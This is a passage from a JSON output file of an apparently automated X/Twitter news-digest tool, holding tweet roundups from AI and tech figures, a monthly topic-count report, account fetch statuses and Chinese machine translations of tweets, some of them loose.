the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: URLError: \n\n### ✅ @Ronald_vanLoon — Ronald van Loon(10 条)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-27T11:20:17+00:00]**\n> Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m)\n\n**[2026-04-23T06:57:05+00:00]**\n> RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions by @IntEngineering #Robotics #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(7 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n**[2026-04-20T15:07:11+00:00]**\n> Here's a crisp summary by @EconChrisClarke of some of the key findings of our Canaries in the Coal Mine, the counter arguments, the counter-counter arguments and the complementary research by others.…\n[原文链接](https://nitter.net/erikbryn/status/2046244291945927102#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T13:44:13.237379+00:00\n**分析账号**: 33个 | **活跃账号**: 17个 | **推文总量**: 145条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:100 条\n- **模型能力**:27 条\n- **投融资与并购**:8 条\n- **交易与市场**:7 条\n- **算力与芯片**:3 条\n\n## 三、活跃账号 Top10\n\n- @JeffDean: 10 条\n- @GaryMarcus: 10 条\n- @HarryStebbings: 10 条\n- @sama: 10 条\n- @Ronald_vanLoon: 10 条\n- @paulg: 10 条\n- @elonmusk: 10 条\n- @jason: 10 条\n- @DavidSacks: 10 条\n- @ylecun: 10 条\n\n## 四、代表性推文\n\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is…\n - https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m\n- @Ronald_vanLoon | 2026-04-27T13:00:19+00:00\n - R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestrat…\n - https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m\n- @Ronald_vanLoon | 2026-04-27T13:00:18+00:00\n - Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one …\n - https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m\n- @Ronald_vanLoon | 2026-04-27T12:50:08+00:00\n - Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m\n- @GaryMarcus | 2026-04-27T12:48:41+00:00\n - R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n - https://nitter.net/GaryMarcus/status/2048746152749846549#m\n- @GaryMarcus | 2026-04-27T12:36:05+00:00\n - People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, wi…\n - https://nitter.net/GaryMarcus/status/2048742983684784239#m\n- @GaryMarcus | 2026-04-27T12:20:17+00:00\n - “Vibe coded disasters piling up on Reddit”\n - https://nitter.net/GaryMarcus/status/2048739005525877072#m\n- @Ronald_vanLoon | 2026-04-27T12:18:17+00:00\n - AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n - https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m\n- @Ronald_vanLoon | 2026-04-27T11:20:17+00:00\n - Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m\n- @paulg | 2026-04-27T10:01:28+00:00\n - One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.\n - https://nitter.net/paulg/status/2048704073356935676#m\n- @paulg | 2026-04-27T09:50:40+00:00\n - You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's…\n - https://nitter.net/paulg/status/2048701354672050286#m\n- @paulg | 2026-04-27T08:17:48+00:00\n - Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to…\n - https://nitter.net/paulg/status/2048677984106664227#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_141139.json b/data/x_brief/history/20260427_141139.json new file mode 100644 index 0000000..5c44a71 --- /dev/null +++ b/data/x_brief/history/20260427_141139.json @@ -0,0 +1,1935 @@ +{ + "generated_at": "2026-04-27T14:08:29.375190+00:00", + "period": { + "days": 7, + "start_utc": "2026-04-20T14:07:47.687403+00:00", + "end_utc": "2026-04-27T14:08:29.375190+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 17, + "total_tweets": 145, + "failed_accounts": 4 + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", + "url": "https://nitter.net/HarryStebbings/status/2048764743205134644#m", + "published_at": "2026-04-27T14:02:33+00:00", + "title_zh": "@HarryStebbings:Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per head.\n\nThey have 80%+ margins.\n\nThey do $5.48BN in revenue.\n\nNo business on the planet has numbers like Applovin.\n\nFollowing the discussion, I wrote up my biggest lessons from sitting down with him and summarised them below:\n\n1. Are People Ready for the AI Future That Is Within Every Company?\n\nTrue AI integration requires a massive \"leveling up\" of talent. Companies must be honest about the path forward: keeping employees who fail to adopt AI creates a \"blockade\" to reaching a truly AI-native state. Consequently, we should expect continued tech layoffs as organizations prioritize efficiency over legacy headcount.\n\n2. Biggest Advice on Token Budgeting and Token Maxing?\n\nTreating tokens as a simple budget or leaderboard is \"flawed logic\". If you incentivize raw usage, teams will simply create high-volume \"crap\" that burns capital without driving revenue. Instead, optimize for specific KPIs where token consumption aligns directly with business growth; when revenue is on the other side, the \"budget\" mindset disappears.\n\n3. Can You Have a Team Full of Only A Players?\n\nAn organization cannot thrive if A players are surrounded by B, C, or D players. AppLovin slimmed its HR department from 80 people to 15 by retaining only \"doers\" who don't get bogged down in the process. The goal is a lean culture of individual contributors who want to make a difference without needing heavy management layers.\n\n4. Do the Majority of Company Teams Need to Be Rebuilt for the Technology We Have Today?\n\nIf a role is likely to be automated, or if a department is too slow to adopt AI, it is time to rebuild that organization from the ground up. Foroughi cut staff by 40-50% in most departments during a year of triple-digit growth to force the organization into an automated, efficient state.\n\n5. Why Investors Need to Give Ceos Better Comp Packages\n\nFounders take massive risks to build something out of nothing, and they need continued upside to stay mentally motivated. If a CEO is expected to work without performance-based incentives, they may drift toward new ventures rather than staying committed to the \"lonely, stressful\" task of scaling a public company.\n\n6. Why This $160 Billion Company Does Not Have Any Learning and Development\n\nStructured L&D is often disconnected from the reality of high-performance work. The best employees are curious enough to figure things out on their own. By documenting all communication in transcripts and chats, new hires can use AI models to summarize tribal knowledge and develop themselves more effectively than any formal training program.\n\n(links below)", + "url": "https://nitter.net/HarryStebbings/status/2048764741435179442#m", + "published_at": "2026-04-27T14:02:33+00:00", + "title_zh": "Adam Foroughi 是我采访过的最出色的 CEO 之一。\n他坦率坦言自己异常严厉且冷酷,但同样偏执、专注且极其出色。\n与 Adam 交流毫无空话,非常干脆。他说的正是他想表达的。\nAppLovin 每位员工的 EBITDA 为 1000 万美元。\n他们的利润率超过 80%。\n他们实现 54.8 亿美元的营收。\n全球没有企业的数据能像 AppLovin 那样突出。\n讨论结束后,我总结了与他交谈中学到的最重要教训" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "How poor #Data foundations can undermine #AI success\nby Joanne Carew @CIOonline\n\nLearn more: https://bit.ly/4cGbKSG\n\n#MachineLearning #ArtificialIntelligence #DeepLearning #ML", + "url": "https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m", + "published_at": "2026-04-27T13:45:07+00:00", + "title_zh": "不完善的数据基础可能阻碍人工智能的成功\nvia Joanne Carew @CIOonline\n了解更多信息:https://bit.ly/4cGbKSG" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00", + "title_zh": "上周末在 Cloud Next 与 Amin Vahdat、@gilbert 和 @djrosent 的对话视频现已上线。\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n感谢这场精彩的对话!" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00", + "title_zh": "⚠️ AI 代理是远远未成熟的科技,发展速度太快。此次流行的人工智能代理灾难案例的核心教训,并不是丢失数据的问题。" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00", + "title_zh": "两个我极为看好的投资领域:\n\n1. 卵子冷冻诊所。在十年内,我认为所有21岁的年轻人都会冷冻自己的卵子,并将此变成常态化。\n\n品质极高的业务,用户留存率惊人,利润率极高。\n\n2. AI再培训设施。在Canary Wharf设立AI培训中心,并与高盛、摩根士丹利等建立合作关系。向他们签订企业协议,并培训新员工。\n\n两者都是绝对的金矿!" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00", + "title_zh": "Anthro 至少需要扩大客服容量,通过Claude或传统客户经理实现。如果他们选择传统客户经理方式,将非常有趣。\n\n此外,越来越多的公司可以采用多模型人工智能的开放架构方式。\n\n这可能会与云计算企业和常用的问题产生相似的状况。我相信这些挑战可适用于其他所有AI供应商。" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00", + "title_zh": "我们与微软的合作关系已更新。\n微软将继续作为我们的主要云合作伙伴,而现在我们可以在整个云环境中提供我们的产品和服务。\n我们将继续向他们提供模型和产品,直到 2032 年,并牵连到 2030 年的营收分成。" + }, + { + "handle": "Ronald_vanLoon", + "account": 